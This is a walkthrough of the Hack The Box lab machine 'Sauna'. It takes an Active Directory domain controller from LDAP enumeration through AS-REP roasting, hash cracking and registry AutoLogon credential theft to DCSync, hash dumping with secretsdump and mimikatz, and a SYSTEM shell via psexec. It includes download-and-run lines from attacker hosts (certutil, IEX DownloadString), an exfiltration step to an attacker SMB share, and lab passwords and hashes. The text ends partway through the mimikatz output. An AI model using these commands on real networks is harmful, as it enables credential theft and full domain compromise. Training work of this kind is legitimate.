As always we start with an nmap scan
# Nmap 7.80 scan initiated Tue Feb 18 03:17:50 2020 as: nmap -A -oN allports 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.076s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-18 16:19:56Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=2/18%Time=5E4B9DC1%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 8h01m51s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-02-18T16:22:19 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 100.30 ms 10.10.16.1 2 100.29 ms 10.10.10.175 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 18 03:23:06 2020 -- 1 IP address (1 host up) scanned in 317.70 seconds
The most interesting ports open were: HTTP(80), Kerberos(88) and Win-RM (5985) .
User
I enumerated the Ldap port:
┌─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $ldapsearch -x -H 10.10.10.175 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $
Next the most interesting part was:
root@kali:~/htb/sauna# ldapsearch -h 10.10.10.175 -p 389 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt root@kali:~/htb/sauna# ls allports ldaplogall.txt # Hugo Smith, EGOTISTICAL-BANK.LOCAL dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL root@kali:~/htb/sauna# ldapsearch -x -H ldap://10.10.10.175 -D 'EGOISTICAL-BANK\hsmith' -w 'Thestrokes23' -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt
Now we have a possible username: “ Hugo Smith ”.
If you try to ASREPRoast that user you will find that it doesn’t exist. So I tried variations of the name and found one that was indeed a valid user: hsmith .
Variations I tried:
Hugo Smith HugoSmith hugo.smith h.smith hsmith smithh smith.h smith.hugo smithhugo smith hugo
Found user:
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile hugosmith.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax
So, now we have a valid user “ hsmith ” but no password…
It’s time to take a look to the web server. In there you will only find a few html pages, some
of them contains interesting names:
So, that we know the format that is being used to create the usernames, let’s check this usernames:
fsmith scoins sdriver btaylor hbear
We found that the user “ fsmith ” is vulnerable to ASREProast and we have obtained the crackable “hash”.
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.LOCAL/FSmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for FSmith
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:cb52c62c6143cf4cc4c71dccf64756f5$d216f5b0ae6326c1a3027dd19f3976e5a8259a5a1c4118f7f61da536f069ac63b15d65498c22399ff1d985819c280dbda2b88236429eaf03d4b1e25b7ba49323a378e4854c3e0b26b6ec7bb4c5245651e32ffb84025e34d9b05db659e80f2b510ccfcb3e0274b13fff13b6e650a987cb2d73f8288239ca15f7aa19e0914f48e5ccfe49af81e1aaf2f3864ed48ebe21e8f32258eeedcf7924022213178f4175dafd77b97dae029dbf57648cafd31769624759538c9f56a92cbf3bb52af1c19488fc633abedb85df88b6297cd921006a2e0706f20ae5a05d5091feeee6870ff014496e38ba7b397d90e4a42bb46940b2cecda70ac4de67dd1ed817028f37cbe46b
So, let’s crack it with john /hashcat and rockyou:
┌─[puck@parrot-lt]─[~/htb/sauna] └──╼ $hashcat -m 18200 ego.hash /usr/share/wordlists/rockyou.txt --force hashcat (v6.1.1) starting... You have enabled --force to bypass dangerous warnings and errors! This can hide serious problems and should only be done when debugging. Do not report hashcat issues encountered when using --force. OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================= * Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5690/5754 MB (2048 MB allocatable), 8MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 204 MB Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 1 sec $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bee59333cd5943cd85e7e49722df567e$262e47ce9223b4a47acdbcb6b5eb5830c09ee84ab07c42b17553ff201c3a5cd8f7d4ef8cdd3017fdb161779c90e486aef38d9afa2ca642ccbd76e70cb7934b2970fd0741bbfffb10c5801e3c05026e535419946c73270917a1405ab01ade94347964967ab62086c4222cece0363269b507692736f893892cf4afd05a60625cc2c3b32211f93425113af6bb8961e0fd46d88a2696cb10b18f7147117d2ac6bf22337cbab822c0f39b9dbc8f8ba78adc9f089b8677258db7b9a066dfb3d20f66be1bf390fa25bee98abb9dcf056c3417adf165f9382e89da61da7c53c708303db61db36bd273ed8f3aba394b1e0f89ad38b0d291502bb494cd589f34f1790e3e14:Thestrokes23 Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, AS-REP Hash.Target......: $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bee5933...0e3e14 Time.Started.....: Sat Sep 24 20:49:12 2022, (12 secs) Time.Estimated...: Sat Sep 24 20:49:24 2022, (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 881.0 kH/s (7.26ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 10551296/14344385 (73.56%) Rejected.........: 0/10551296 (0.00%) Restore.Point....: 10534912/14344385 (73.44%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: Tioncurtis23 -> TUGGIE Started: Sat Sep 24 20:48:53 2022 Stopped: Sat Sep 24 20:49:25 2022 ┌─[puck@parrot-lt]─[~/htb/sauna]
root@kali:~/htb/sauna# john ego.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:33 DONE (2020-02-18 04:48) 0.02995g/s 315720p/s 315720c/s 315720C/s Thines..Theredwolf_120691
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Credentials found: fsmith:Thestrokes23
Now, just connect via Win-RM and grab the user flag:
root@kali/opt/evil-winrm# ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i EGOTISTICAL-BANK.LOCAL *Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt 1b5520b98d97cf17f24122a55baf70cf *Evil-WinRM* PS C:\Users\FSmith\desktop> certutil -urlcache -split -f http://10.10.14.10/WINPEAS.exe C:\Users\FSmith\Documents\WINPEAS.exe
Root
I started enumerating the box using winPEAS
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winpeas.exe systeminfo userinfo
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
--snip--
[+] RDP Sessions(T1087&T1033)
Not Found
[+] Ever logged users(T1087&T1033)
[X] Exception: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at winPEAS.UserInfo.GetEverLoggedUsers()
Not Found
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
or it can be done manually
*Evil-WinRM* PS C:\Users\FSmith\Documents> REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368
ShutdownFlags REG_DWORD 0x80000027
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
*Evil-WinRM* PS C:\Users\FSmith\Documents>
It found some interesting credentials inside the Winlogon registry:
There isn’t any user called “ svc_loanmanager ” but there is one called “ svc_loanmgr ” svc_loanmgr : Moneymakestheworldgoround!
And you can connect to it with the password extracted from the registry:
You can also use Sharphound to enumerate the Domain and you will find that the user svc_loanmgr has permissions to execute DCSync against the DC:
Bloodhound
We can use Bloodhound to enumerate and visualise the Active Directory domain, and identify possible attack chains that will allow us to elevate our domain privileges. The bloodhound–python ingestor can be used to remotely collect data from the Active Directory. Then, we can run
bloodhound to visualise any available attack paths.
sudo apt install bloodhound
sudo pip install bloodhound-python
bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All
Start neo4j server.
neo4j console
Then type bloodhound to access the BloodHound UI. When bloodhound–python is finished,
compress the files into a zip and upload it
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u svc_loanmgr -p "Moneymakestheworldgoround!" -i EGOTISTICAL-BANK.LOCAL
Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.70/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 5:42 PM on 2/18/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 ì/s --- Using 83 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4511238
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc_loanmgr\Documents\20200218174244_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200218174244_BloodHound.zip Info: Downloading 20200218174244_BloodHound.zip to 20200218174244_BloodHound.zip Info: Download successful! *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> exit Info: Exiting with code 0 root@kali:/opt/evil-winrm#
*Evil-WinRM* PS C:\programdata> .\Sharphound.exe -c all 2022-09-24T18:56:56.9785964-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound 2022-09-24T18:56:57.1192436-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-09-24T18:56:57.1506456-07:00|INFORMATION|Initializing SharpHound at 6:56 PM on 9/24/2022 2022-09-24T18:57:09.3379487-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-09-24T18:57:09.4786146-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL 2022-09-24T18:57:09.5098741-07:00|INFORMATION|Producer has finished, closing LDAP channel 2022-09-24T18:57:09.5098741-07:00|INFORMATION|LDAP channel closed, waiting for consumers 2022-09-24T18:57:39.9005021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM 2022-09-24T18:58:07.2442001-07:00|INFORMATION|Consumers finished, closing output channel 2022-09-24T18:58:07.2754507-07:00|INFORMATION|Output channel closed, waiting for output task to complete Closing writers 2022-09-24T18:58:07.3691997-07:00|INFORMATION|Status: 94 objects finished (+94 1.649123)/s -- Using 42 MB RAM 2022-09-24T18:58:07.3691997-07:00|INFORMATION|Enumeration finished in 00:00:57.9016252 2022-09-24T18:58:07.4473475-07:00|INFORMATION|Saving cache with stats: 53 ID to type mappings. 53 name to SID mappings. 0 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2022-09-24T18:58:07.4473475-07:00|INFORMATION|SharpHound Enumeration Completed at 6:58 PM on 9/24/2022! Happy Graphing! *Evil-WinRM* PS C:\programdata> dir *.zip Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/24/2022 6:58 PM 11485 20220924185806_BloodHound.zip *Evil-WinRM* PS C:\programdata> upload 20220924185806_BloodHound.zip
.
*Evil-WinRM* PS C:\temp> net use \\10.10.14.10\share /u:puck puck The command completed successfully. *Evil-WinRM* PS C:\temp> cp 20220924185806_BloodHound.zip \\10.10.14.10\share\ *Evil-WinRM* PS C:\temp>
┌─[✗]─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $sudo impacket-smbserver -username puck -password puck share . -smb2support
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.175,49819)
[*] AUTHENTICATE_MESSAGE (\df,SAUNA)
[*] User SAUNA\df authenticated successfully
[*] df:::aaaaaaaaaaaaaaaa:cc698eaf23e930262c688bcc686fffb5:010100000000000000a9108a48d0d801946617735218756000000000010010004d004700790044004d0048006d004800030010004d004700790044004d0048006d0048000200100076005a0052004a0064007a00670058000400100076005a0052004a0064007a00670058000700080000a9108a48d0d80106000400020000000800300030000000000000000000000000210000fcffb479cf1627839a9882b2cc0e3163d00d1e286c75c538f3ed06b8e7187bd80a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310030000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
.
After examining the bloodhound graph, i figured out i could use aclpwn.py https://github.com/puckiestyle/aclpwn.py to set DCSync permission to user svc-loanmgr, and then use secretsdump.py to get the hashes
I use Sharphound to enumerate the Domain and found that the user svc_loanmgr has permissions to execute DCSync against the DC: .
I use Sharphound to enumerate the Domain and found that the user
svc_loanmgr has permissions to execute DCSync against the DC:root@kali:/opt/aclpwn.py# aclpwn -f svc_loanmgr -ft user -d EGOTISTICAL-BANK.LOCAL -du svc-loanmgr Please supply the password or LM:NTLM hashes of the account you are escalating from: Moneymakestheworldgoround! [+] Path found! Path: (SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL)-[GetChangesAll]->(EGOTISTICAL-BANK.LOCAL) [-] DCSync -> continue [+] Finished running tasks
root@kali:/opt/aclpwn.py# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175 -just-dc Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation Password: Moneymakestheworldgoround! [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7a2965077fddedf348d938e4fa20ea1b::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031 Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0 Administrator:des-cbc-md5:19d5f15d689b1ce5 krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:a90968c91de5f77ac3b7d938bd760002373f71e14e1a027b2d93d1934d64754a SAUNA$:aes128-cts-hmac-sha1-96:0bf0c486c1262ab6cf46b16dc3b1b198 SAUNA$:des-cbc-md5:b989ecc101ae4ca1 [*] Cleaning up...
root@kali:~/htb/sauna# psexec.py -hashes d9485863c1e9e05851aa40cbb4ab9dff:d9485863c1e9e05851aa40cbb4ab9dff administrator@10.10.10.175 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 10.10.10.175..... [*] Found writable share ADMIN$ [*] Uploading file hPakdifs.exe [*] Opening SVCManager on 10.10.10.175..... [*] Creating service LxqM on 10.10.10.175..... [*] Starting service LxqM..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.973] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32> c:\Users\Administrator\Desktop>type root.txt f3ee04965c68257382e31502cc5e881f root@kali:~/htb/sauna# impacket-wmiexec.py -hashes d9485863c1e9e05851aa40cbb4ab9dff:d9485863c1e9e05851aa40cbb4ab9dff administrator@10.10.10.175
reference used : https://github.com/fox-it/aclpwn.py
files used : https://github.com/puckiestyle/aclpwn.py
Mimikatz way: ( ipv secretsdump )\
I can also use Mimikatz like BloodHound suggested. I’ll download the latest release from the release page, and upload the 64-bit binary to Sauna:
┌──(puck㉿kali)-[~/htb/sauna] └─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> cd c:\programdata *Evil-WinRM* PS C:\programdata> upload /x64/mimikatz.exe *Evil-WinRM* PS C:\programdata> .\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator [DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain [DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server [DC] 'administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) Account expiration : Password last change : 7/26/2021 9:16:16 AM Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500 Object Relative ID : 500 Credentials: Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f lm - 0: 365ca60e4aba3e9a71d78a3912caf35c lm - 1: 7af65ae5e7103761ae828523c7713031 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 716dbadeed0e537580d5f8fb28780d44 * Primary:Kerberos-Newer-Keys * Default Salt : EGOTISTICAL-BANK.LOCALAdministrator Default Iterations : 4096 Credentials aes256_hmac (4096) : 42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 aes128_hmac (4096) : a9f3769c592a8a231c3c972c4050be4e des_cbc_md5 (4096) : fb8f321c64cea87f OldCredentials aes256_hmac (4096) : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031 aes128_hmac (4096) : 145e4d0e4a6600b7ec0ece74997651d0 des_cbc_md5 (4096) : 19d5f15d689b1ce5 OlderCredentials aes256_hmac (4096) : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef aes128_hmac (4096) : 52c02b864f61f427d6ed0b22639849df des_cbc_md5 (4096) : d9379d13f7c15d1c * Primary:Kerberos * Default Salt : EGOTISTICAL-BANK.LOCALAdministrator Credentials des_cbc_md5 : fb8f321c64cea87f OldCredentials des_cbc_md5 : 19d5f15d689b1ce5 * Packages * NTLM-Strong-NTOWF * Primary:WDigest * 01 b4a06d28f92506a3a336d97a66b310fa 02 71efaf133c578bd7428bd2e1eca5a044 03 974acf4f67e4f609eb032fd9a72e8714 04 b4a06d28f92506a3a336d97a66b310fa 05 79ba561a664d78d6242748774e8475c5 06 f1188d8ed0ca1998ae828a60a8c6ac29 07 801ddc727db9fa3de98993d88a9ffa8b 08 a779e05da837dd2d303973304869ec0f 09 ac2c01846aebce4cbd4e3ec69b47a65d 10 6d863d6ae06c3addc49b7a453afe6fa0 11 a779e05da837dd2d303973304869ec0f 12 6676b9fdd4aa7f298f1ada64c044c230 13 5a01167d750636d66e5602db9aece9b7 14 f702282bd343c2fee7b98deac8950390 15 a099aa3c81f1affeba59d79a6533f60d 16 4bae84b8f0b0306788ff9bda4acb3bd4 17 976d547fb9e04b0ac5ec60508c275da1 18 50c302b71d0e08a1a2be14b56225645f 19 edb19e08653443695f6d3599e0a6bddf 20 c497465ddc6e2fc14cb0359d0d5de7f8 21 2ed0b4b57196fb190a66224b2b17029f 22 37d03051ae1cd6046975948564ab01fa 23 